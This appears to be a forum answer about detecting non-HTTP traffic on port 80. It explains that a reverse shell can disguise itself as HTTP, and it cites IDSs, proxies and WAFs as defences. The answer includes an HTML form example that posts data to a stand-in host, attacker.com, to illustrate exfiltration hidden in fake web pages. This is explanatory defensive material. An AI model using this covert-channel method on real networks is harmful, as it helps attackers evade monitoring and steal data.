Detect non HTTP packets using port 80
IDSs and several deep inspection firewalls (sometimes called NGFW or UTM) can usually detect whether the traffic is HTTP or not. Also a HTTP proxy in front would simply block anything which is not proper HTTP.
But be aware that it is possible to build a reverse shell where the traffic will look like HTTP, so this filtering will only help a bit.
The attacker can easily mimic HTTP traffic, so I will doubt any IDS/IPS would prevent a well developed shell from mimicking HTTP requests to exfiltrate data. It's very easy to create a fake HTML page, embed the images with <img src="data:image/png;base64,iVBORw0KG…8bg5CYII=">
and put the traffic inside.
A lossless compression (like PNG) will allow the sending of whatever data is needed to the client inside, and data can be sent outside using <form action="http://attacker.com/submit.pl" method="post" enctype="multipart/form-data">
.
Advanced IPS/IDS can help you. but there are some kinds of firewalls that are completely customized for web (HTTP/HTTPS).
They are called WAFs, Web Application Firewalls.
A good WAF with a proper configuration can prevent many attacks, like the one which you're speaking about.